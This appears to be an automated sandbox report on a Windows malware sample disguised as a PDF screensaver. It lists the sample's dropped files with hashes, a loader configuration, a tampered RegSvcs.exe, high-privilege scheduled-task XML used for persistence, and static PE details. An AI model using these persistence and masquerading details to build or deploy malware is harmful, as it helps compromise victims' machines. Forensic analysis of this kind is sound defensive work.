              Preview:..'..9..3....h.>...}...] .....].o.RG^....n?Z.h=.k.([._....H..Q..7.4.].x..c.?..k...dd..Qp` ........i.>..d..........@o.?~.z.x.....'.Z.c.c.h.c.B.9.5.4.N.9.p.c.9.9.E.8.9.w.V.E.6.r.3.2.1.Y.4.3.Q.5.d.9.4.8.0.9.2.X.5.4.S.x.1.7.B.A.y.W.w.....'.4.Z.6.8.1.5.X.4.9.Y.F.2.6.S.8.M.C.8.8.2.1.p.z.1.7.9.....'....R).....s....Q..*.;..G.o.Sb....6...$.{r7Z......@..TK..5).........GnS.&k.o...F..h.P..+.|......f^J..(m......._.5....$....b8!n...M..R..~{...Q..#\....T..e.yJ...I.......W[@...r..F*.Z.....ipr....'.w.A.U.3.C.4.0.a.h.o.J.1.A.W.0.8.2.D.e.I.S.8.N.4.0.6.J.2.1.5.U.C.V.1.0.s.8.U.L.G.7.1.8.i.K.C.0.....'.5.X.w.z.0.2.W.3.y.R.4.h.3.W.n.M.1.S.a.3.3.k.X.6.J.S.A.t.....'.6.4.i.8.L.T.I.8.a.7.i.D.4.8.U.0.n.5.V.7.b.s.e.g.1.....'..Q./........nA*.._U.-..t.:+.H.Yeq.(......E..Pg....LI.....K.@AkY..% "......n.4K@'.'...K....MC.|..l.Y.f.......z8.Z.G<!....'.J......[.....v..%TKerW~...J..J2YP.m|...N].IN.....g....Py....4."<%.U..+.._.L..t.I.....r..B.6.B....v?/.F.....a....~=.e....W":.....K.T...bkB,...9k#y

              C:\Users\user\AppData\Local\Temp\Folder10_51\lpolln.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):632
              Entropy (8bit):6.226044296719832
              Encrypted:false
              SSDEEP:
              MD5:32C554BAC7052BFF5BBB4E69058154E4
              SHA1:A46476E21653B14423F462D7C3CF6EC16199A204
              SHA-256:B4BFAAF128F118F5B45AAEDC20246B3517926363C75DA64EBEF63D648FCBAC08
              SHA-512:D74B0DEDAC5A006E06CE5A9D7F91C1AC4FE5E4D355EC7A9F8F8683CDB83D4E584A47937D8B3C58198FC85A4C2F14261953B527E79204A53E64C3F6B9B3FB51BD
              Malicious:false
              Reputation:unknown
              Preview:...................................... ..................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\mttapgts.dll

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):535
              Entropy (8bit):6.223028920694769
              Encrypted:false
              SSDEEP:
              MD5:C32315E0688E0A5633A0D2DCE4CC9629
              SHA1:F581EE1E102167C604CF366415105BB9314CF4B5
              SHA-256:E92602D9F89967C956CA83477F419BF1F5F917D95E3C0501BD6EA1BF76E85808
              SHA-512:F5FFC31716F87A024883845607BE750FF782F114C3EC76378F6A78255857A47C9929EBDDBC9325CBE1D35887FAED615F1874320326C40215EFBE2A99193E2BF4
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\nkbixmwpld.ppt

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):656
              Entropy (8bit):6.264380029804187
              Encrypted:false
              SSDEEP:
              MD5:194DE31777DD53F9E29A06776AE6C1B3
              SHA1:A4FF9EF9C4962628810B38368D4EFB13F53449D7
              SHA-256:90EA34BF2E24E4AD5DF9FD37CEA36ABB7784931028F401F98A2E6C2A10B5583E
              SHA-512:637EAED24EB4EF8A4EE96BFAF11524901799DC8FBFD2DFDB3B478521B99BE49D056A9745388AC29A70A54390A449FC493B6F9CA5E00095DBDB192FA236B1C9B1
              Malicious:false
              Reputation:unknown
              Preview:..................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\opmotkfi.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):584
              Entropy (8bit):6.2507180834396046
              Encrypted:false
              SSDEEP:
              MD5:F87E4604F5916FF6A25186B0B504E681
              SHA1:DB2989E8ED40A5CEED078473341C5D8B8FE4E0F7
              SHA-256:0A8B1D99032C6B90054E5ADF89EFA61D005B0F3E12DA48905051067ED906D529
              SHA-512:9CDD4285C8B9CF1C90BD9A73071C839D933EE44149E8CE689AA1ADE39056EAFD9CBBF348AC8BD5340A2DF7E8D91AE0529E872C377FA90DE46FB698395A8D9152
              Malicious:false
              Reputation:unknown
              Preview:...........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\riviu.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):733
              Entropy (8bit):6.231676397919319
              Encrypted:false
              SSDEEP:
              MD5:DD66397E376C91D7F01F231D944C8DF1
              SHA1:8C2F651AF93B763090395AED51C2E551942DFEC3
              SHA-256:FF281486360AD0A5E071BFAE276626E80D212EA65AFBD3CA7784B0F4B3570D09
              SHA-512:7E81472C48AF0D9712068FB66500253F673629A313AF680071E8C8C961CB27D589F249AD688292259E384E4BCFC48161E901C6CB27659E16B42242C1E1CF2238
              Malicious:false
              Reputation:unknown
              Preview:.................................................................%..........................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\rjfwh.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.220144182081156
              Encrypted:false
              SSDEEP:
              MD5:7FFF06723AFA9FC84547B1E2D379AABD
              SHA1:4929D1A9298E365087EFDD2B019C05F6CF750E70
              SHA-256:B26D7992C99861FEE8E8E86614AF8A0B145AE8F2AEA197CE6BA8408EF07B9698
              SHA-512:538759223E6C9DEFE1F50B1AFF4C44CDDAF21C0712C51271E44431683C6E7F632F57800909CB48B7A0C26A02DDE11549FD996DFEDE8B50C97731CCB77B24EA3B
              Malicious:false
              Reputation:unknown
              Preview:......................................*................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\sdhmdt.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):581
              Entropy (8bit):6.223635486991566
              Encrypted:false
              SSDEEP:
              MD5:B74B8AC3F96B39CC953D1BA34CB751DD
              SHA1:48050CB8EA9C5A3B5108706C987799673A1454FC
              SHA-256:A3FB7C9084245E0939340B7ABBFA54C7AE7367CCF3D5E134EAA847E1EA453AEC
              SHA-512:A7F912456131E21627C14DADD6DF84AA9642006191D60A7E0B486B3850B8B0B63F87C559C5257344C98917501289782DFFC9347670B265C908CFDAEB0CDCCAE4
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................j.............................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\taon.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):501
              Entropy (8bit):6.190656898709683
              Encrypted:false
              SSDEEP:
              MD5:4171BED3F16A92882815F61417AB975A
              SHA1:97A4483C79036BE8148C6169C7CCFF080742F40C
              SHA-256:E5F2CF9586AA8F0634FEE2474D46BCF6030846F0B4A02FED80F65700FCA8F0F8
              SHA-512:59566FBFDF44FE734293BF1E1DC1FAC5A63D4458E858EA05B602F56613257F99DEEBB4C7D961169A01C774DAC87A1BA35C020B7FB9FF327970E60973661A109C
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\tuhvewrqqk.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):514
              Entropy (8bit):6.214291435583763
              Encrypted:false
              SSDEEP:
              MD5:55F643ECFE99B550B4823D0DB2E473C1
              SHA1:1DE1E7E890127FBCE7DCC4283B1F0ED2073071B8
              SHA-256:3283E76A48819F103CA6F2E58AB9911EF46DA4A6438E9CD37FD0628E0F664E17
              SHA-512:02B7C643A796B8B88CA0E3EE20024E15F13E0BB25B1A08F331408D0405EE39A478728365D61FC722356F73058050FD2230C28600076A8DCFCADEAC9BE1066863
              Malicious:false
              Reputation:unknown
              Preview:........................................................................P.......................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\usvv.dll

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.170181324269657
              Encrypted:false
              SSDEEP:
              MD5:42788E9A82626033D1C890FEC1616027
              SHA1:4BC3D32071130B8830BA6999CAB6E836AFA741A6
              SHA-256:60B95B214023625539B917062F51833E9923711321185E7702ECCF0F9E16B256
              SHA-512:0334DB3EDE8EA3CB5107527EE5F162EFA37CE7C4CDBB168361614A6300443C0BDCF03590340C0E985882DA20C66717CC585F8621758AA81A9953BA04BA7ACCFB
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\utxniv.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):583
              Entropy (8bit):6.261328591888464
              Encrypted:false
              SSDEEP:
              MD5:E5450ED1310BAA27DF96331533B7116A
              SHA1:8F6F7C76A308B213EF39DE070CD3DF23B90EC209
              SHA-256:B5A1C32F1B74BD9BC40CB515B88DD0B1C0FB449DABC9E93AC75C581F111EEFB3
              SHA-512:519BE0EAFDBCD915E4C404F11DA4A713364BDF2EB4A2ADAD0E0CC16E3B0AA634C5AD0A5F498CCE8E3193365BDE1635154F054B4D54E4BF47EA6ACBA6F041A459
              Malicious:false
              Reputation:unknown
              Preview:...........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\uvoxoq.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):753
              Entropy (8bit):6.265094025870397
              Encrypted:false
              SSDEEP:
              MD5:61F20CA5A3C48D6323D19BEB700DE2F4
              SHA1:FEC46018E797396868619396016CC00F3E9F0D7D
              SHA-256:8637DDC34CC6276D56738F219D8AD4EB4BBF73D80CEE16AA0C686B96E49031A2
              SHA-512:AD6CABC216D4F5212FC3AA7EDAD6289E6CBE4C6E7336E804083D0E8AB390F6554E088B735761A6F3E1D7D9F93737EA0D2E32FB02B7ECD787EF6F5BDC4984044A
              Malicious:false
              Reputation:unknown
              Preview:.........f..........................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\vkeewq.txt

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.201022804655084
              Encrypted:false
              SSDEEP:
              MD5:3D1A20AE25ACA76918F525813753BB90
              SHA1:40EF954835A5E919E13155803E422FCB59A4D6E7
              SHA-256:72B7AA6124893C2A087D1691D2C7AD052903E028BEE451F5350C7BFFA2C50AD5
              SHA-512:706116CECE24D60C06B4691FF94B01BB7811165D6003CD7829CD32C9F791DEB2FC30753E9FEE794A1947CB422BCA69E7A5E6C90C8BCC07FA7598C579D185ADD3
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\vlsdwgv.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):510
              Entropy (8bit):6.227023728555456
              Encrypted:false
              SSDEEP:
              MD5:BF8C92BF8491E4783B72B4CCDA5E91BB
              SHA1:7D3E0FE500A79523FCB5C9E636E3B399C0FD8CA9
              SHA-256:B7FDCD17F59F82AD25996F0D1DB018624A51022D94780493A4AB98047C2EA7A3
              SHA-512:42092933F616ED495EE9D2DB9C5C40C34DA55DFE9E9A74A832DED06106EE0BF142AE220780BE2E820C97878A6B88BAFF450B66C89966D02F73F659974BD7A3BF
              Malicious:false
              Reputation:unknown
              Preview:...................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):34981
              Entropy (8bit):5.585572477462829
              Encrypted:false
              SSDEEP:
              MD5:923021E60F76E22DF3997015A75D2DE2
              SHA1:0BF1F4312CB742E0FD3AA4797CD68839DD50EB86
              SHA-256:AC7EB1744189B9B145C3056E7847B5C17F27ED32BB66E05C5B7AE5CA024866B3
              SHA-512:C9E2B8BD11CF6DC78AF257148ABF0E0126FFE55130E6A80F63DEB33FA320B7048C6AFADDFEB692BD5D747D47D0EAD7EB45B203E62BB4F085567AB7E3E503200B
              Malicious:false
              Reputation:unknown
              Preview:oL0826i1j1u..0f8r26zx431oHqN82gD145xd6x0E8YWVM650gXWc0rm8V095vib1Vsg1ph8EKi5D7y..0173r5904j1898hnZJb026fa4507MCD53T3vXI2e2hbI70s9i3zLKNVc5p3xW22..vn1x706pd349Btai6yHA162L25q1UP68785556E35xTBkR10GQ34sD9KF685..Mzu91s391IX01TMyJx7274d68P3gcZjpy8K953..THq58775p06yPBeXyG02646wz345m9..s99120P1V9hdVZ3clCMqTD28Of780zY4DzQ37cN134g91N686gb482862..4i8uy6nx2A2M54dp79IL4G13clh3V02K96F56zVemX8..W7687B9MDnbR9vwrauSB6VulPly512506f5cfUC95D6277z44oQa7693845g52AVt3..0u2yc89702DWG392FIgnM8ffH6KdQ0A..jbmz085IBt5747RXzqI96174BEbEg3FCq97V39DTc75b6E776P5Lv658L..78718M9c92LxuBRb1d6k..6L7d8elyRl47L0K3hOHKb7k4I70T0A3l9zv22464RI..6K1Vi3jmT54uR8nrL1dc3w068ZH4rw6L9..Pg8qeyhfwbbcBAp51Wap0PsJET4909M3Vb6R39EMbyM3B5h8ye1q6V1..8ZA5K6d89Y18oh2rx3f98oWa23O2RIx0qErnm6489d9n9kq6Fj79t3O79uKm7541..Xi640jzRer6E56F83Va2B6uq39s5Ygif1oQY48J7hJ59331174QK265544201w9uNUm0gy0Zulw9..2X94fc65x4j53AD7A50N27n3Znl164U25O18689190M78a2IK..7FP81La529Q702RX0e8w02950u2V6UfP85Fr9U5uv48U183T2U90W79UL10o860dF2q264..o1JI2X27358f15m9M8..195dc62uVyg

              C:\Users\user\AppData\Local\Temp\Folder10_51\whonujk.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.245277588351939
              Encrypted:false
              SSDEEP:
              MD5:6A372892797F0436A2022B5C0D051DDF
              SHA1:D2138DA84C4D4469393DAF6B309C699D3776835B
              SHA-256:7E732B89FD4BA6996C2FEFB7DB6DA5BDE6B85E6BC44F7EA21DAA62992AE6A61A
              SHA-512:F25D9D07788FCB898C9174F06CFD76FC86F5CDD1202463BFA431CD7DCF72BD4B3616D3EF6F1B373898E551B515771F2A8DF8ED7E199982B0BC89AB06C0C40151
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\wuqc.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):704
              Entropy (8bit):6.242209133425222
              Encrypted:false
              SSDEEP:
              MD5:30766DEDBDECAFF845571EEA5F3B21E4
              SHA1:514644B945925EEEE525AF9A8737277954B89288
              SHA-256:084034C5553C3DC615FA87DD84E10679480C16460B6A7F2EF3C5D8B0943683DD
              SHA-512:9CA41F1331CDBDE97DFFE697D3500117AB4DB8D19A12A900910CF8AF0526CEF5311295E10B3464FAA1451B3F6C8E445B8C48360FDDF239DAEF5E4651B76D6E60
              Malicious:false
              Reputation:unknown
              Preview:..................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\RegSvcs.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:modified
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

              C:\Users\user\AppData\Local\Temp\tmpA401.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1311
              Entropy (8bit):5.120237537969728
              Encrypted:false
              SSDEEP:
              MD5:9CC9B31561289BF47DDBEF114BE4B6FA
              SHA1:C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
              SHA-256:984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
              SHA-512:075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
              Malicious:true
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

              C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:51BBBB873C030E460FAD17FEDABBC3AB
              SHA1:5CC4E4B44A56143A4634286AA9E05F8607426C06
              SHA-256:AF3FBBF96097D55438E4F0F623AB560923B3E01927AC132EEA4D194DF8D96F42
              SHA-512:FAB50F156C07AF56AD56024C5E3E9443F1E31A524EAE3EA50BA699AC7CDEF7EE8BA65219E2A10F24F42D025C1080787F847CDE081FD21D10649D86B89516AB8B
              Malicious:true
              Reputation:unknown
              Preview:Y.;hR..H

              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):48
              Entropy (8bit):4.556127542695029
              Encrypted:false
              SSDEEP:
              MD5:71C86F4534ED6EA4C1E9A785F2EB0A92
              SHA1:D065F0540580FC2E0ACD365784FD5A60F8235829
              SHA-256:DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
              SHA-512:6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
              Malicious:false
              Reputation:unknown
              Preview:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe

              C:\Users\user\temp\wfccrina.ini

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):91
              Entropy (8bit):5.006199003780079
              Encrypted:false
              SSDEEP:
              MD5:AEF559A1D83E37D78B012A94CCE85889
              SHA1:44228F31FBDA6D787CD91E082E8EF769A23B37AA
              SHA-256:637F2CAB19C58F9E961062E379089A4DCDDCA806EA439BC8C0E63285DEC9F294
              SHA-512:235B7E78EBFFC6640E9476A85C3FD528A4C420F62DCA2AD7FA8C8105669B3278DEDBD50E51B73A7344775C7B9C076594DFDC91FD3857875278066039B91D9A9C
              Malicious:false
              Reputation:unknown
              Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder10_51..ExE_c=ihgsvw.exe..

              \Device\ConDrv

              Download File
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1141
              Entropy (8bit):4.44831826838854
              Encrypted:false
              SSDEEP:
              MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
              SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
              SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
              SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
              Malicious:false
              Reputation:unknown
              Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.853911292117169
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:004349256789197.pdf.scr.exe
              File size:1181640
              MD5:3ac05bbe35293fbfd0df49ecfb34c461
              SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
              SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
              SHA512:21f616118075066eda343383aad8d6f2dd71bc33c9b8efec3eedc891414d96a0602449abddb96513d55da97ddedb987d612d8227dfd8f64ca85ed2051eb02e14
              SSDEEP:24576:9TbBv5rUeTM/TYaxVKPijgGjFwJ5gRn0Bz76hZYBA3pUd26P207:XBvsHB7jQ5Cnq7+ZEA3pEt+0
              TLSH:AD451202BBC695B3D5A3193256753B11BA3CB9601FA58ECFA7E00A5CDA315C0DB317B2
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

              File Icon

              Icon Hash:938c8c90b2ea6ab2

              Static PE Info

              General

              Entrypoint:0x41f530
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:12e12319f1029ec4f8fcbed7e82df162

              Entrypoint Preview

              Instruction
              call 00007F216C70BF2Bh
              jmp 00007F216C70B83Dh
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F216C6FE687h
              mov dword ptr [esi], 004356D0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 004356D8h
              mov dword ptr [ecx], 004356D0h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 004356B8h
              push eax
              call 00007F216C70ECCFh
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F216C70B9CCh
              push 0000000Ch
              push esi
              call 00007F216C70AF89h
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C6FE602h
              push 0043BEF0h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E789h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C70B948h
              push 0043C0F4h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E76Ch
              int3
              jmp 00007F216C710207h
              int3
              int3
              int3
              int3
              push 00422900h
              push dword ptr fs:[00000000h]

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4a8c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
